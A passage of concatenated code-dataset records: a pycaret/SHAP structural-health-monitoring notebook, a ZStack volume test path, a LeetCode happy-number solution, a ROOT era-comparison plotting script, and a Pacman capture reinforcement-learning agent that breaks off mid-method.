labels=np.arange(20).tolist())\nmapping = dict(list(enumerate(values)))\nk=0\nfor i in direc:\n for niv in range(quantidadeniveis):\n plt.figure(niv+k)\n for j in range(1,quantidadetemperaturas+1):\n #print(diretorio+'/'+i+'/'+i+'T'+str(j)+'.csv')\n locals()[i+'_T'+str(j)] = pd.read_csv(diretorio+'/'+i+'/'+i+'T'+str(j)+'.csv',header=None,delimiter=' ').T\n aux_std = eval(i+'_T'+str(j)).groupby(mapping, axis = 1).std()\n 
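The SHM script condenses each 2000-sample signal into 20 bins and keeps the per-bin mean and standard deviation as features. A self-contained sketch of the same trick; note that `groupby(..., axis=1)` is deprecated in recent pandas, so this version groups the transposed frame instead:

```python
import numpy as np
import pandas as pd

def binned_features(df, n_bins=20):
    """Compress signal columns into per-bin mean and std features,
    mirroring the record's pd.qcut + groupby construction."""
    bins = pd.qcut(np.arange(df.shape[1]), n_bins, labels=False)
    grouped = df.T.groupby(bins)       # group sample columns by bin code
    means = grouped.mean().T
    stds = grouped.std().T
    stds.columns = stds.columns + n_bins   # keep feature names distinct
    return pd.concat([means, stds], axis=1)

# e.g. 5 signals of 2000 samples -> 5 rows x 40 features
demo = pd.DataFrame(np.random.randn(5, 2000))
print(binned_features(demo).shape)
```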
aux_std.columns = aux_std.columns+20\n locals()[i+'_T'+str(j)] = pd.concat([eval(i+'_T'+str(j)).groupby(mapping, axis = 1).mean(), aux_std], axis=1)\n print(i+'_T'+str(j))\n for niv in range(quantidadeniveis):\n plt.figure(niv+k)\n plt.plot(eval(i+'_T'+str(j)).loc[0,:],eval(i+'_T'+str(j)).loc[1+quantidadeamostras*niv:quantidadeamostras+1+quantidadeamostras*niv,:].mean())\n plt.title(str(niv)+' '+i)\n #eval(i+'_T'+str(j)).loc[:,'temp'] = temperaturas[j]\n k=k+quantidadeniveis\n\n# %% [markdown]\n# ### Construindo os dados de treino e validação\n# %%\nfor i in ['PZT3_T1','PZT3_T2','PZT3_T3','PZT6_T1','PZT6_T2','PZT6_T3','PZT7_T1','PZT7_T2','PZT7_T3']:\n #eval(i).loc[0, 'target'] = 11111\n for niv in range(quantidadeniveis):\n eval(i).loc[1+quantidadeamostras*niv:quantidadeamostras+1+quantidadeamostras*niv, 'target'] = int(niv)\n eval(i).dropna(inplace=True)\neval(i).describe()\n\n# %% [markdown]\n# ### separando os dados de treino e validação\n# sinais = pd.concat([PZT3_T1,PZT3_T2, PZT3_T3])\n# sinais =sinais.sample(frac=1).reset_index(drop=True)\n# features = sinais.drop(columns=['target'])\n# y = sinais['target']\n# y.value_counts()\n\n# from sklearn.model_selection import train_test_split\n# Xtrain, Xval, ytrain, yval = train_test_split(features, y, train_size=0.5)\n\n# Xtrain.shape, Xval.shape, ytrain.shape, yval.shape\n\n# yval.value_counts()\n\n# Xtrain.columns\n\n# %%\nimport seaborn as sns\ncorr = sinais.corr()\n# plot the heatmap\nfig_dims = (25, 20)\nfig, ax = plt.subplots(figsize=fig_dims)\nsns.heatmap(corr, \n xticklabels=corr.columns,\n yticklabels=corr.columns,\n annot=True, fmt=\".2f\", ax=ax, cmap='RdYlBu')\n# %%\nfrom pycaret.classification import *\nexp_clf102 = setup(data = sinais, target = \"target\", session_id=123)\n\n# %% [markdown]\n# ### Para acessar os dados de treino e teste deve acessar da seguinte forma \n# #### Xteste = exp_clf102 \\[3\\]\n# #### yteste = exp_clf102 \\[5\\]\n\n# %%\nbest_model = compare_models()\nprint(best_model)\n\n# %% [markdown]\n# ### Precision:\n# Todo mundo que era da classe 1 quantos % foi previstos sendo da classe 1\n# ### recall:\n# Todos os exemplos da classe 1 quantos % foram detectados\n# ### f1-score\n# Média armonica entre precision e recall\n# \n\n# %%\nknn = create_model('knn')\ntuned_knn = tune_model(knn)\nprint(tuned_knn)\n\nplot_model(tuned_knn, plot = 'auc')\n\nplot_model(tuned_knn, plot = 'pr')\n\nplot_model(tuned_knn, plot = 'confusion_matrix')\n\n\n# %%\nimport shap\n\n# load JS visualization code to notebook\nshap.initjs()\n\n# %% [markdown]\n# ### Criando o explainer que é um objeto que representa o modelo\n# ### E o shap_values que é uma lista com 2 arrays para cada exemplo treinado, e apresenta a probabilidade de ser da classe 1 para o primeiro array e probabilidade de ser da classe 2 para o array 2 \n\n# %%\nexplainer = shap.KernelExplainer(tuned_knn.predict_proba, exp_clf102[2])\nshap_values = explainer.shap_values(Xtrain)\nshap_values[1].shape\n\n# %% [markdown]\n# ### Expected_values são as previsoes médias feitas pelo explainer para cada dado treinado\n\n# %%\nprint('Dados de treino: ' )\n# Xtrain\n#print(exp_clf102[2])\n# Ytrain\nprint(exp_clf102[4].values)\n\n\n# %%\nprint('Dados de treino: ' )\n# Xtrain\n#print(exp_clf102[3])\n# Ytrain\nprint(exp_clf102[5].values)\n\n\n# %%\nprint('Previsoes do modelo: ')\nprint(tuned_knn.predict(exp_clf102[3]))\n\n\n# %%\nexplainer.expected_value\n\n# %% [markdown]\n# ### Classe 2 - dano 2 para a instancia 0\n# Probabilidade de pertencer a classe de dano 2\n\n# 
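`shap.KernelExplainer` is model-agnostic but expensive, so it is common to summarize the background set first and explain only a few rows. A minimal sketch on a stand-in classifier (iris and KNN here are illustrative; in older shap releases `shap_values` returns one array per class, which is what the notebook's indexing assumes):

```python
import shap
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier

X, y = load_iris(return_X_y=True)
model = KNeighborsClassifier().fit(X, y)

# Summarize the background with k-means centroids to keep the
# kernel estimation tractable, then explain a handful of rows.
background = shap.kmeans(X, 10)
explainer = shap.KernelExplainer(model.predict_proba, background)
shap_values = explainer.shap_values(X[:5])

# one entry per class; expected_value holds the per-class base rates
print(len(shap_values), explainer.expected_value)
```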
%%\nshap.force_plot(explainer.expected_value[2], shap_values[2][0,:], Xtrain.iloc[0,:])\n\n# %% [markdown]\n# ### Classe 1 - dano 1 para a instancia 0\n# Probabilidade de pertencer a classe de dano 1\n\n# %%\nshap.force_plot(explainer.expected_value[1], shap_values[1][0,:], Xtrain.iloc[0,:])\n\n# %% [markdown]\n# ### Classe 0 - baseline para a instancia 0\n# Probabilidade de pertencer a classe de baseline\n\n# %%\nshap.force_plot(explainer.expected_value[0], shap_values[0][0,:], Xtrain.iloc[0,:])\n\n\n# %%\nshap.force_plot(explainer.expected_value[1], shap_values[1], Xtrain)\n\n# %% [markdown]\n# ## Features mais importantes do modelo\n# #### Cor: vermelho: maior que amédia\n# #### Cor: azul: menor que a média\n# Eixo x é o impacto na previsão (empurrando pra cima + ou para baixo -)\n\n# %%\nshap.summary_plot(shap_values[1], Xtrain)\n\n\n# %%\nshap.dependence_plot(15, shap_values[0], Xtrain, interaction_index=3)\n\n\n# %%\n\n\n\n","sub_path":"Dados - Experimento com Porcas - 3 Vigas de Aço/modelo_shap_SHM_pycaret.py","file_name":"modelo_shap_SHM_pycaret.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350287084","text":"import zstackwoodpecker.test_state as ts_header\nTestAction = ts_header.TestAction\ndef path():\n return dict(initial_formation=\"template1\",\\\n path_list=[[TestAction.delete_volume, \"vm1-volume1\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume2\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume3\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume4\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume5\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume6\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume7\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume8\"], \\\n\t\t[TestAction.create_volume, \"volume1\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume1\"], \\\n [TestAction.create_volume, \"volume2\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume2\"], \\\n [TestAction.create_volume, \"volume3\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume3\"], \\\n [TestAction.create_volume, \"volume4\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume4\"], \\\n [TestAction.create_volume, \"volume5\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume5\"], \\\n [TestAction.create_volume, \"volume6\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume6\"], \\\n [TestAction.create_volume, \"volume7\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume7\"], \\\n [TestAction.create_volume, \"volume8\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume8\"], \\\n [TestAction.detach_volume, \"volume1\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume2\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume3\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume4\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume5\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume6\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume7\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume8\", \"vm1\"], \\\n\t\t[TestAction.create_volume, \"volume9\", \"=scsi\"], \\\n\t\t[TestAction.create_volume, \"volume10\", \"=scsi\"], \\\n\t\t[TestAction.create_image_from_volume, \"vm1\", \"image1\"], \\\n\t\t[TestAction.attach_volume, \"vm1\", \"volume9\"], \\\n\t\t[TestAction.create_volume_backup, \"volume9\", \"backup1\"], 
\\\n\t\t[TestAction.delete_volume, \"volume9\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"], \\\n\t\t[TestAction.attach_volume, \"vm1\", \"volume10\"], \\\n\t\t[TestAction.create_volume_backup, \"volume10\", \"backup2\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"], \\\n\t\t[TestAction.ps_migrate_volume, \"volume3\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"]])\n","sub_path":"integrationtest/vm/multihosts/volumes/paths/path88.py","file_name":"path88.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640539768","text":"# -*- coding: utf-8 -*-\n# @Author: Orange灬Fish\n# @Date: 2019-05-06 22:21:35\n# @Last Modified by: Orange灬Fish\n# @Last Modified time: 2019-05-06 22:51:37\n\n\nclass Solution:\n\tdef isHappy(self, n):\n\n\t\tsqr = []\n\n\t\tdef judge(n):\n\t\t\tif n == 1:\n\t\t\t\treturn True\n\t\t\ts = str(n)\n\t\t\tnextnum = 0\n\t\t\tfor i in s:\n\t\t\t\tnextnum += int(i) ** 2\n\t\t\tif nextnum == 1:\n\t\t\t\treturn True\n\t\t\tif nextnum in sqr:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tsqr.append(nextnum)\n\t\t\t\treturn judge(nextnum)\n\n\t\treturn judge(n)\n\n","sub_path":"Leetcode/leetcode202 快乐数.py","file_name":"leetcode202 快乐数.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312317993","text":"import ROOT\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n#list files\npath='UEanalysis/analysis'\nonlyfiles = [f for f in listdir(path) if 'MuonEG' in f]\n\ndist='chmult_None_inc_None_True'\n#dist='chflux_None_inc_None_True'\n#dist='chfluxz_None_inc_None_True'\n#dist='chavgpt_None_inc_None_True'\n#dist='chavgpz_None_inc_None_True'\n#dist='aplanarity_None_inc_None_True'\n#dist='sphericity_None_inc_None_True'\n#dist='C_None_inc_None_True'\n#dist='D_None_inc_None_True'\n\nplots={}\ntotal=None\nfor f in onlyfiles:\n era=re.search('(?<=2016)\\w+', f).group(0)[0]\n era='BCDEF' if era in ['B','C','D','E','F'] else 'GH'\n\n #getdistribution from file\n fIn=ROOT.TFile.Open(join(path,f))\n h=fIn.Get(dist)\n if not era in plots:\n plots[era]=h.Clone(era)\n plots[era].SetTitle(era)\n plots[era].SetDirectory(0)\n else:\n plots[era].Add(h)\n if total is None:\n total=h.Clone('total')\n total.SetTitle('2016')\n total.SetDirectory(0)\n else:\n total.Add(h)\n fIn.Close()\n\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(0)\nROOT.gStyle.SetOptTitle(0)\nfrom TopLJets2015.TopAnalysis.Plot import Plot\np=Plot(dist)\ncolors={'B':ROOT.kOrange-8,\n 'C':ROOT.kOrange-6,\n 'D':ROOT.kOrange-4,\n 'E':ROOT.kOrange+4,\n 'F':ROOT.kBlue+2,\n 'BCDEF':ROOT.kOrange-4,\n 'G':ROOT.kBlue-4,\n 'H':ROOT.kBlue-9,\n 'GH':ROOT.kBlue-9,\n }\nfor era in plots:\n plots[era].Scale(1./plots[era].Integral())\n p.add(plots[era],era,colors[era],False,False,False)\ntotal.Scale(1./total.Integral())\np.add(total,'2016',1,True,True,False)\np.ratiorange=(0.7,1.3)\np.doPoissonErrorBars=False\np.show(outDir=' ~/www/TopUE_ReReco2016/eras/',lumi=35900,noStack=True,noRatio=False) #True)\n#raw_input()\n","sub_path":"TopAnalysis/test/TopUEAnalysis/compareEras.py","file_name":"compareEras.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"41558334","text":"# myTeam.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# 
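The leetcode 202 record detects repeats recursively through a shared `sqr` list; the same check is usually written iteratively with a set. A sketch:

```python
def is_happy(n):
    """Iterative happy-number check: revisiting any digit-square sum
    means we are in a cycle that never reaches 1."""
    seen = set()
    while n != 1 and n not in seen:
        seen.add(n)
        n = sum(int(d) ** 2 for d in str(n))
    return n == 1

assert is_happy(19) and not is_happy(2)
```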
solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom captureAgents import CaptureAgent\nimport random, time, util\n#from game import Directions\n#from game import Grid\n#import game\nimport math\nimport time\n#import pandas as pd\nimport numpy as np\n#import functools\n#import operator\n\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import StandardScaler\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#import os.path\nfrom os import path\n\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed, first='Agent_North', second='Agent_South'):\n \"\"\"\n This function should return a list of two agents that will form the\n team, initialized using firstIndex and secondIndex as their agent\n index numbers. isRed is True if the red team is being created, and\n will be False if the blue team is being created.\n\n As a potentially helpful development aid, this function can take\n additional string-valued keyword arguments (\"first\" and \"second\" are\n such arguments in the case of this function), which will come from\n the --redOpts and --blueOpts command-line arguments to capture.py.\n For the nightly contest, however, your team will be created without\n any extra arguments, so you should make sure that the default\n behavior is what you want for the nightly contest.\n \"\"\"\n\n # The following line is an example only; feel free to change it.\n return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n\n##########\n# Agents #\n##########\n\nclass Comrades(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. 
If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n self.field_width = gameState.data.layout.width\n self.field_height = gameState.data.layout.height\n self.field_mid_width = int((self.field_width - 2) / 2)\n self.field_mid_height = int((self.field_height - 2) / 2)\n self.my_indices, self.enemy_indices = self.get_indices(gameState)\n self.food_inside = 0\n self.food_inside_prev = 0\n self.approaching_food_reward = 0\n self.prev_current_food_amount = len(gameState.getBlueFood().asList())\n self.drop_positions = self.get_drop_positions(gameState)\n self.approaching_drop_reward = 0\n self.approaching_enemy_reward = 0\n self.flag_food_eaten = False # if pellet consumed by agent\n self.flag_death = False # if agent got eaten\n self.flag_enemy_around = False # if enemy is around\n self.flag_enemy_death = False # if enemy got eaten\n self.turn_counter = 0\n self.prev_best_action = 'Stop'\n\n self.my_initial_pos = gameState.getInitialAgentPosition(self.index)\n\n self.data_set_current = []\n self.data_actions = ['Stop']\n\n self.epsilon = 0.2 # exploration rate\n self.gamma = 0.85 # gamma for discounted reward\n self.epochs = 100 # number of epochs for learning\n self.learning_step = 20 # update Q-target function\n self.history_size = 10000 # amount of samples kept from previous games\n self.train_buffer_size = 1000\n\n self.flag_delay = False # slow game visualisation\n\n # -=REWARD modifiers=-\n self.reward_modifiers()\n\n # variables for functions and classes\n self.state_data = self.create_state_data_simple\n self.add_reward = self.add_reward\n self.Duel_Q_Network = Duel_Q_Network_simple\n\n self.rewards_values = np.empty(0) # reward for each step\n self.flag_done = False # if game over\n\n self.online_Q_network, self.optimizer, self.my_scaler, self.my_history, self.total_epochs, self.num_games_played = self.load_model()\n\n #self.my_scaler = Normalizer()\n\n\n # return 2 arrays of our indices and enemy indices\n def get_indices(self, gameState):\n if self.red:\n return gameState.getRedTeamIndices(), gameState.getBlueTeamIndices()\n else:\n return gameState.getBlueTeamIndices(), gameState.getRedTeamIndices()\n\n # transform string action to the integer index\n def action_to_index(self, act):\n def stop():\n return 0\n def north():\n return 1\n def east():\n return 2\n def south():\n return 3\n def west():\n return 4\n switcher = {\n 'Stop': stop,\n 'North': north,\n 'East': east,\n 'South': south,\n 'West': west\n }\n return switcher[act]()\n\n # transform string actions array to integer index array\n def actions_to_indices(self, acts):\n result = []\n for act in acts:\n result.append(self.action_to_index(act))\n return result\n\n # transform index to string action\n def index_to_action(self, index):\n actions = ['Stop', 'North', 'East', 'South', 'West']\n return actions[index]\n\n # return new position\n def action_to_pos(self, action, pos):\n new_pos = list(pos)\n def stop():\n return\n def north():\n new_pos[1] += 1\n def east():\n new_pos[0] += 1\n def south():\n new_pos[1] -= 1\n def west():\n new_pos[0] -= 1\n switcher = {\n 'Stop': stop,\n 'North': north,\n 'East': east,\n 'South': south,\n 'West': west\n }\n switcher[action]()\n return tuple(new_pos)\n\n # FEATURE SPACE of games state\n def 
create_state_data_simple(self, gameState):\n self.score = self.getScore(gameState)\n # food, drop, capsule, enemy prediction per action: -1 for leave, 1 for approach\n food_future_dist = np.zeros(5)\n capsule_future_dist = np.zeros(5)\n drop_future_dist = np.zeros(5)\n enemy_future_dist = np.zeros((2, 5))\n\n grid_qualities = np.zeros(12, dtype=int)\n\n #flag_enemy = False\n\n if not self.flag_done:\n # enemy data\n for i, item in enumerate(self.enemy_data):\n if item:\n #flag_enemy = True\n pos, dist, timer = item\n grid_qualities[2 + i] = timer\n grid_qualities[4 + i] = 5 / dist\n for action in self.actions:\n j = self.action_to_index(action)\n enemy_future_dist[i, j] = self.get_approaching_enemy_reward(gameState, action, pos, dist, timer)\n\n for action in self.actions:\n ind = self.action_to_index(action)\n drop_future_dist[ind] = self.get_approaching_drop_reward(gameState, action)\n food_future_dist[ind] = self.get_approaching_food_reward(gameState, action)\n capsule_future_dist[ind] = self.get_approaching_capsule_reward(gameState, action)\n\n # my scary timer grid_qualities[0] relative position grid_qualities[1]\n x_t = self.my_current_position[0]\n grid_qualities[0] = gameState.getAgentState(self.index).scaredTimer\n # relative x of the agent\n n = 1 if self.red else -1\n grid_qualities[1] = (x_t - self.field_mid_width) / self.field_width * n\n\n grid_qualities[6] = self.score\n grid_qualities[7] = 5 / (self.my_capsule_distance + 1)\n grid_qualities[8] = self.food_inside\n grid_qualities[9] = self.current_food_amount\n grid_qualities[10] = self.enemy_food_amount\n self.turn_counter += 1\n grid_qualities[11] = 20 / (301 - self.turn_counter)\n\n return np.concatenate((food_future_dist, drop_future_dist, capsule_future_dist, enemy_future_dist.ravel(),grid_qualities))\n\n # return arrays of positions of our food, enemy food, our capsules, enemy capsules\n def all_food_positions(self, gameState):\n blue_food = gameState.getBlueFood().asList()\n red_food = gameState.getRedFood().asList()\n blue_capsules = gameState.getBlueCapsules()\n red_capsules = gameState.getRedCapsules()\n if self.red:\n current_food_positions = blue_food\n enemy_food_positions = red_food\n capsules_for_me = blue_capsules\n capsules_for_enemy = red_capsules\n else:\n current_food_positions = red_food\n enemy_food_positions = blue_food\n capsules_for_me = red_capsules\n capsules_for_enemy = blue_capsules\n return current_food_positions, enemy_food_positions, capsules_for_me, capsules_for_enemy\n\n # get power capsules from enemy side and distance\n def get_capsules_for_me_dist(self):\n capsules = self.capsules_for_us\n if len(capsules) > 0:\n dist = min([self.getMazeDistance(self.my_current_position, cap) for cap in capsules])\n else:\n dist = float('inf')\n return capsules, dist\n\n # return approaching food reward\n def get_approaching_food_reward(self, gameState, action):\n reward = 0\n if len(self.my_food_positions) > 0:\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, food) for food in self.my_food_positions])\n if new_distance > self.my_food_distance:\n reward = -1\n elif new_distance < self.my_food_distance:\n reward = 1\n return reward\n\n # return approaching capsule reward\n def get_approaching_capsule_reward(self, gameState, action):\n reward = 0\n if len(self.capsules_for_me) > 0:\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, cap) for cap in 
self.capsules_for_me])\n if new_distance > self.my_capsule_distance:\n reward = -1\n elif new_distance < self.my_capsule_distance:\n reward = 1\n return reward\n\n # return approaching drop reward\n def get_approaching_drop_reward(self, gameState, action):\n reward = 0\n if self.at_home(self.my_current_position, 0):\n return reward\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, drop) for drop in self.drop_positions])\n if new_distance > self.current_drop_distance:\n reward = -1\n elif new_distance < self.current_drop_distance:\n reward = 1\n return reward\n\n # fill self.enemy_data\n def create_enemy_data(self, gameState):\n for i, ind in enumerate(self.enemy_indices):\n pos = gameState.getAgentPosition(ind)\n if pos and self.get_manh_dist(pos, self.my_current_position):\n timer = gameState.getAgentState(ind).scaredTimer\n dist = self.getMazeDistance(pos, self.my_current_position)\n self.enemy_data[i] = (pos, dist, timer)\n\n # return approaching enemy reward/penalty\n def get_approaching_enemy_reward(self, gameState, action, pos, dist, timer):\n reward = 0\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_dist = self.getMazeDistance(my_new_pos, pos)\n adjustment = 0\n if new_dist > dist:\n adjustment = 1\n elif new_dist < dist:\n adjustment = -1\n\n enemy_home = self.at_home(pos, 0)\n enemy_scared = timer > 0\n self_scared = gameState.getAgentState(self.index).scaredTimer > 0\n\n if (not enemy_home and enemy_scared) or (enemy_home and not self_scared):\n reward -= adjustment\n else:\n reward += adjustment\n return reward\n\n # get manhattan distance\n def get_manh_dist(self, pos1, pos2):\n dist = abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n if dist > 5:\n return False\n else:\n return True\n\n # return array of all food-drop positions on the board\n def get_drop_positions(self, gameState):\n positions = []\n x = self.field_mid_width\n if not self.red:\n x += 1\n h = int(self.field_mid_height * 2 + 1)\n for y in range(1, h):\n if not gameState.hasWall(x, y):\n positions.append((x, y))\n return positions\n\n # if action results in eating pellet\n def food_eaten_flag(self, gameState, best_action):\n flag = False\n successor = self.getSuccessor(gameState, best_action)\n if self.red:\n food = successor.getBlueFood().asList()\n else:\n food = successor.getRedFood().asList()\n if self.current_food_amount == len(food) + 1:\n flag = True\n return flag\n\n # get enemy's death flag\n def check_enemy_deaf(self, gameState, action, pos, timer):\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n if pos == my_new_pos:\n e_s = timer > 0\n m_s = gameState.getAgentState(self.index).scaredTimer > 0\n cond_1 = not self.at_home(my_new_pos, 0) and not self.at_home(pos, 0) and e_s\n cond_2 = self.at_home(my_new_pos, 0) and self.at_home(pos, 0) and not m_s\n if cond_1 or cond_2:\n return True\n return False\n\n # check if position in our side of the board\n def at_home(self, my_pos, deep):\n if (self.red and my_pos[0] <= self.field_mid_width - deep) or (\n not self.red and my_pos[0] > self.field_mid_width + deep):\n return True\n return False\n\n # calculate and add reward for each turn to the reward array\n def add_reward(self):\n reward = 0\n if self.prev_best_action == 'Stop':\n reward -= self.penalty\n # if self.flag_done:\n # reward += self.score * self.score_multiplier\n # if self.score > 0:\n # reward += self.win_reward\n # elif self.score < 0:\n # reward -= self.win_reward\n\n if 
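The `get_approaching_*_reward` helpers above all share one shape: +1 when the move closes the maze distance to the nearest target, -1 when it opens it, 0 otherwise. Factored out as a sketch, with `dist_fn` standing in for `self.getMazeDistance`:

```python
def approach_reward(dist_fn, pos, new_pos, targets):
    """+1 if the move closes distance to the nearest target, -1 if it
    opens it, 0 otherwise (the shape shared by the reward helpers)."""
    if not targets:
        return 0
    old = min(dist_fn(pos, t) for t in targets)
    new = min(dist_fn(new_pos, t) for t in targets)
    return (old > new) - (old < new)   # bool arithmetic: 1, -1, or 0
```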
self.flag_enemy_death:\n reward += self.enemy_death_reward\n elif self.flag_death:\n reward -= self.my_death_penalty\n\n if self.food_inside == 0:\n reward += self.food_inside_prev * self.drop_food_multiplier\n elif self.flag_food_eaten:\n reward += self.food_eaten_reward\n\n if self.flag_enemy_around:\n reward += self.approaching_enemy_reward * self.approaching_enemy_multiplier\n elif self.food_inside_prev >= self.stomach_size or self.prev_current_food_amount < 3:\n reward += self.approaching_drop_reward * self.approaching_drop_multiplier\n else:\n reward += self.approaching_food_reward * self.approaching_food_multiplier\n\n self.rewards_values = np.concatenate((self.rewards_values, [reward]))\n\n # helper function for chooseAction\n def choose_action_by_probability(self, output):\n tempo = np.array([output[i] for i in range(output.shape[0]) if self.index_to_action(i) in self.actions])\n tempo = np.exp((tempo - tempo.max()) / 1)\n tempo = tempo / np.sum(tempo)\n self.best_action = np.random.choice(self.actions, p=tempo)\n\n # -=ACTION=-\n def chooseAction(self, gameState):\n \"\"\"\n Picks among actions randomly.\n \"\"\"\n if self.flag_delay:\n time.sleep(0.04)\n\n self.actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n self.my_current_position = gameState.getAgentState(self.index).getPosition()\n self.is_home = self.at_home(self.my_current_position, 0)\n if self.is_home:\n self.food_inside = 0\n\n self.current_drop_distance = min([self.getMazeDistance(self.my_current_position, drop) for drop in self.drop_positions])\n\n self.current_food_positions, self.enemy_food_positions, self.capsules_for_us, self.capsules_for_enemy = self.all_food_positions(gameState)\n self.capsules_for_me, self.my_capsule_distance = self.get_capsules_for_me_dist()\n\n #self.current_food_positions.sort(key=lambda x: x[1])\n self.current_food_amount = len(self.current_food_positions)\n self.enemy_food_amount = len(self.enemy_food_positions)\n self.my_food_positions = self.get_my_food_positions()\n if len(self.my_food_positions) > 0:\n self.my_food_distance = min([self.getMazeDistance(self.my_current_position, food) for food in self.my_food_positions])\n else:\n self.my_food_distance = float('inf')\n\n\n self.enemy_data = [None, None]\n self.create_enemy_data(gameState)\n\n state_data = np.asarray(self.state_data(gameState))\n if self.flag_new_model:\n features = state_data\n else:\n features = self.my_scaler.transform(state_data.reshape(1, -1))[0]\n tensor_features = torch.FloatTensor(features).unsqueeze(0)\n self.online_Q_network.eval()\n result = self.online_Q_network(tensor_features).detach().numpy()[0]\n\n if random.random() < self.epsilon:\n self.choose_action_by_probability(result)\n #self.best_action = random.choice(self.actions)\n else:\n indices = result.argsort()[::-1]\n for ind in indices:\n self.best_action = self.index_to_action(ind.item())\n if self.best_action in self.actions:\n break\n\n self.flag_death = False\n if self.my_current_position == self.my_initial_pos:\n self.flag_death = True\n\n self.data_set_current.append(state_data)\n self.add_reward()\n self.data_actions.append(self.best_action)\n\n self.flag_food_eaten = self.food_eaten_flag(gameState, self.best_action)\n if self.flag_food_eaten:\n self.food_inside += 1\n self.food_inside_prev = self.food_inside\n self.prev_current_food_amount = self.current_food_amount\n\n self.approaching_food_reward = self.get_approaching_food_reward(gameState, self.best_action)\n 
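`choose_action_by_probability` max-shifts the Q-values for numerical stability, exponentiates, normalizes, and samples among the legal actions only. The same masked-softmax sampling as a standalone sketch:

```python
import numpy as np

def sample_legal_action(q_values, legal_idx, temperature=1.0):
    """Softmax-sample an action index restricted to legal_idx,
    matching choose_action_by_probability (max-shifted for stability)."""
    q = np.asarray([q_values[i] for i in legal_idx], dtype=float)
    p = np.exp((q - q.max()) / temperature)
    p /= p.sum()
    return int(np.random.choice(legal_idx, p=p))
```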
